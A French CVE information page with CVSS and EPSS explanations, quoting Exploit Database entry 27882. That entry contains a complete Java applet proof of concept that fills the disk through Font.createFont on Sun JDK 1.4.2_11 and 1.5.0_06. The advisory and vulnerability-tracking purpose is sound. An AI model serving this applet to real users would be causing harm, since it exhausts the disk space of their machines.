Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
6.4 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 27882
Date de publication : 2006-05-14 22h00 +00:00
Auteur : Marc Schoenefeld
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/17981/info
Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.
Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.
Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.
import java.applet.Applet;
import java.awt.Font;
import java.io.InputStream;
class MIS extends InputStream
{
MIS()
{
}
public int read()
{
return 0;
}
public int read(byte abyte0[], int i, int j)
{
return j - i;
}
}
public class FontCreatorFullDiskApplet extends Applet
{
public FontCreatorFullDiskApplet()
{
}
static
{
try
{
byte abyte0[] = new byte[0];
Font font = Font.createFont(0, new MIS());
}
catch(Exception exception) { }
}
}
Products Mentioned
Configuraton 0
Sun>>Jdk >> Version 1.5.0
Sun>>Jre >> Version 1.5.0
Sun>>Sdk >> Version 1.5.0_6
Références